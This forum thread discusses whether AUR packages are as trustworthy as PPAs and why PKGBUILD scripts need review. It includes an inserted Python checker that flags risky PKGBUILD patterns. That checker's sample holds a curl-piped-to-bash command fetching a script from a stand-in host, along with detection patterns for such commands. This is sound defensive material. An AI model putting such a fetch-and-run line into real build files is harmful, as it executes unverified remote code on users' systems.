this post was submitted on 09 Sep 2024
122 points (95.5% liked)


During the first impressions of said distro, what feature surprised you the most?

[–] [email protected] 1 points 2 months ago (2 children)

Isn't installing from the AUR equivalent to installing from a PPA, in terms of security and trust?

[–] [email protected] 10 points 2 months ago (2 children)

Almost. But with one key difference. PPAs are precompiled binaries where you cannot inspect the source - you have to trust the maintainer of the PPA. AUR is a repository of source packages which you can download and inspect yourself (or hope others have done this). This makes AUR more community focused than PPAs I feel. AUR is also a central repo managed by people that don't own the vast majority of the packages hosted on it and where packages can be taken down if found malicious. PPAs are lots of separate repositories all managed by different people that generally maintain all the packages for their PPA.

Though in both cases anyone can upload anything to them, so they are not 100% trustworthy. But I do think the way AUR works puts them ahead of PPAs.

[–] sga 3 points 2 months ago (1 children)

There is one more thing - unless you are using something like chaotic aur, or a very popular package, please pay attention to PKGBUILDs. These are essentially bash scripts which can (depending on your package manager) run with highest permissions. They can do anything.

[–] [email protected] 3 points 2 months ago

They also may not compile stuff from source, they can download and install binaries and some AUR packages do exactly that.

There's zero guarantee when using AUR. It's not supported by Arch for a reason.
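
An added example, not part of the thread: a static first pass over a PKGBUILD that flags the points raised in the comments above (prebuilt binaries, unverified or extra downloads, install-time hooks) by reading the file as text, never sourcing it. The sample PKGBUILD, the `review_pkgbuild` name and the check labels are constructed for illustration; a hit means "read this part by hand", not "malicious".

```python
import re

# Constructed sample PKGBUILD for illustration (not a real AUR package).
SAMPLE_PKGBUILD = """\
pkgname=exampletool-bin
pkgver=1.0.0
pkgrel=1
arch=('x86_64')
source=("http://downloads.example.invalid/exampletool_${pkgver}_amd64.deb")
sha256sums=('SKIP')
install=exampletool.install

package() {
  bsdtar -xf data.tar.xz -C "$pkgdir"
  curl -sL https://example.invalid/extra.sh | bash
}
"""

# (label, regex) pairs. Each one marks a spot a human reviewer should read.
CHECKS = [
    # Package repackages a vendor binary instead of building from source.
    ("prebuilt-binary", r"^pkgname=.*-bin\b|\.(deb|rpm|AppImage)\b"),
    # 'SKIP' in a checksum array means makepkg does not verify that source.
    ("checksum-skipped", r"^(md5|sha\d+|b2)sums(_\w+)?=\([^)]*\bSKIP\b"),
    # Source fetched without transport security.
    ("insecure-source-url", r"\b(http|ftp)://"),
    # Indented curl/wget: a fetch inside a function, outside source=() checksums.
    ("download-outside-source-array", r"^[ \t]+.*\b(curl|wget)\b"),
    # Output of some command fed straight into a shell.
    ("pipe-to-shell", r"\|\s*(sudo\s+)?(ba|z)?sh\b"),
    # install= names a scriptlet that pacman runs as root at install time.
    ("install-hook", r"^install="),
]

def review_pkgbuild(text):
    """Return the sorted labels of all patterns found in the PKGBUILD text."""
    findings = set()
    for label, pattern in CHECKS:
        if re.search(pattern, text, re.MULTILINE):
            findings.add(label)
    return sorted(findings)

if __name__ == "__main__":
    for label in review_pkgbuild(SAMPLE_PKGBUILD):
        print("review:", label)
```
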

[–] [email protected] 1 points 2 months ago

Also you can't just install these packages, you have to import the keyrings of any packages that access the kernel. That requires you to go to the website, check out the owner of the key, see their contributions and decide for yourself if you trust it.

[–] [email protected] 2 points 2 months ago* (last edited 2 months ago)

There is no security and trust when it comes to 3rd-party repos. There can be anything in there. Neither the AUR nor PPAs come with any guarantees.